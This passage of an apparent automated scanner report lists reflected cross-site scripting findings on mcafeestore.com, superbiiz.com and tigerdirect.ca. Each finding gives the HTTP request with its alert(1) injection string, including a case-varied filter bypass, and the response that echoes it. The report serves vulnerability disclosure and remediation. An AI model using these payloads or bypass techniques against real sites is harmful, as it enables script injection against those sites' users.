This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD?a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=189362801782,0)
Content-Length: 22022
Date: Fri, 30 Sep 2011 12:44:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&ScRiPt>90a9b8ecfa6=1&SiteID=mfe&StyleID=25690700&StyleVersion=17&a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage"-->
...[SNIP]...

3.432. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fb79--><script>alert(1)</script>fc01acd1c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD?6fb79--><script>alert(1)</script>fc01acd1c27=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197952748186,0)
Content-Length: 24170
Date: Fri, 30 Sep 2011 12:45:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?6fb79--><script>alert(1)</script>fc01acd1c27=1&Action=DisplayESIPage&Currency=NZD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.433. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3b99a--><script>alert(1)</script>af58d55f6c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20?3b99a--><script>alert(1)</script>af58d55f6c7=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=292442027539,0)
Content-Length: 22051
Date: Fri, 30 Sep 2011 12:45:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?3b99a--><script>alert(1)</script>af58d55f6c7=1&Action=DisplayESIPage&Currency=AUD&Currency=NZD+&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.434. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_HK [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.en_HK

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d804f--><script>alert(1)</script>2393c4a14c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.en_HK?d804f--><script>alert(1)</script>2393c4a14c8=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107758469954,0)
Content-Length: 24151
Date: Fri, 30 Sep 2011 12:45:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=HKD&ESIHC=c4711e3e&Env=BASE&Locale=en_HK&SiteID=mfe&StyleID=25690900&StyleVersion=17&ceid=176851100&cename=TopHeader&d804f--><script>alert(1)</script>2393c4a14c8=1&id=HomeOffersPage&script>
...[SNIP]...

3.435. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.fr_FR [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.fr_FR

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f851--><script>alert(1)</script>699ad509a1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.fr_FR?1f851--><script>alert(1)</script>699ad509a1e=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129233291908,0)
Content-Length: 24323
Date: Fri, 30 Sep 2011 12:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="fr" lang="fr">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?1f851--><script>alert(1)</script>699ad509a1e=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=fr_FR&SiteID=mfe&StyleID=25691000&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.436. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.it_IT [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.it_IT

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1e9d--><script>alert(1)</script>68ed7624ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.it_IT?a1e9d--><script>alert(1)</script>68ed7624ca6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=202247765601,0)
Content-Length: 26606
Date: Fri, 30 Sep 2011 12:45:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="it" lang="it">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=it_IT&SiteID=mfe&StyleID=25691200&StyleVersion=18&a1e9d--><script>alert(1)</script>68ed7624ca6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.437. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.nl_NL [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.nl_NL

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 917e8--><script>alert(1)</script>e342d0f2059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.nl_NL?917e8--><script>alert(1)</script>e342d0f2059=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=124938368333,0)
Content-Length: 24378
Date: Fri, 30 Sep 2011 12:46:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="nl" lang="nl">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?917e8--><script>alert(1)</script>e342d0f2059=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=nl_NL&SiteID=mfe&StyleID=25691300&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.438. http://www.superbiiz.com/detail.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superbiiz.com
Path:   /detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b68"%3balert(1)//b5200695155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54b68";alert(1)//b5200695155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /detail.php?name=CT128M/54b68"%3balert(1)//b52006951554SSD HTTP/1.1
Host: www.superbiiz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.superbiiz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c083f61086964f93a1c231e843784a5e; header_tag=cmp; __utma=109066375.1837267420.1317385486.1317385486.1317385486.1; __utmb=109066375.1.10.1317385486; __utmc=109066375; __utmz=109066375.1317385486.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:26:52 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=c083f61086964f93a1c231e843784a5e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - - SuperB
...[SNIP]...
<script type="text/javascript">
document.write(unescape("%3Cscript src='/counter.js.php?name=CT128M/54b68";alert(1)//b52006951554SSD' type='text/javascript'%3E%3C/script%3E"));
</script>
...[SNIP]...

3.439. http://www.superbiiz.com/detail.php [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superbiiz.com
Path:   /detail.php

Issue detail

The value of the name request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f067f"%3balert(1)//6149eba4ed9 was submitted in the name parameter. This input was echoed as f067f";alert(1)//6149eba4ed9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /detail.php?name=CT128M4SSDf067f"%3balert(1)//6149eba4ed9 HTTP/1.1
Host: www.superbiiz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.superbiiz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c083f61086964f93a1c231e843784a5e; header_tag=cmp; __utma=109066375.1837267420.1317385486.1317385486.1317385486.1; __utmb=109066375.1.10.1317385486; __utmc=109066375; __utmz=109066375.1317385486.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:26:44 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=c083f61086964f93a1c231e843784a5e535900e1cf5ec8bcf563ea90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - - SuperB
...[SNIP]...
<script type="text/javascript">
document.write(unescape("%3Cscript src='/counter.js.php?name=CT128M4SSDf067f";alert(1)//6149eba4ed9' type='text/javascript'%3E%3C/script%3E"));
</script>
...[SNIP]...

3.440. http://www.superbiiz.com/shopcart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superbiiz.com
Path:   /shopcart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a92"><script>alert(1)</script>2fa6b99892b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:33:12 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=qkcjuqnh219tvtvagk20canvo6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 92119


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Computer Parts
...[SNIP]...
<form name=addCoupon method=post action="/shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b" >
...[SNIP]...

3.441. http://www.superbiiz.com/testimonial_list.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superbiiz.com
Path:   /testimonial_list.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea34'><script>alert(1)</script>4bbda3f12e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:33:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=qkcjuqnh219tvtvagk20canvo6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 40799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Computer Parts
...[SNIP]...
<a href='/testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2?&perPage=10&page=2'>
...[SNIP]...

3.442. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.superbiiz.com
Path:   /signin.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f46d'><script>alert(1)</script>f64e888d837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin.php/4f46d'><script>alert(1)</script>f64e888d837 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:33:25 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=qkcjuqnh219tvtvagk20canvo6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 32823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Computer Pa
...[SNIP]...
<form action='https://www.superbiiz.com/signin.php/4f46d'><script>alert(1)</script>f64e888d837' name="BillingShipping" method=post >
...[SNIP]...

3.443. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.superbiiz.com
Path:   /signin.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6077b"><script>alert(1)</script>bee7bf45bb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin.php/6077b"><script>alert(1)</script>bee7bf45bb8 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 Sep 2011 12:33:24 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=qkcjuqnh219tvtvagk20canvo6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 32823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Computer Pa
...[SNIP]...
<form action="/signin.php/6077b"><script>alert(1)</script>bee7bf45bb8" name=reg method=post >
...[SNIP]...

3.444. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [EdpNo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dade9"%3balert(1)//2de852d3325 was submitted in the EdpNo parameter. This input was echoed as dade9";alert(1)//2de852d3325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495dade9"%3balert(1)//2de852d3325&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:25:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msRandX=44a4be4dd28947e8b83bdb940&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Vary: Accept-Encoding
Content-Length: 67296


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
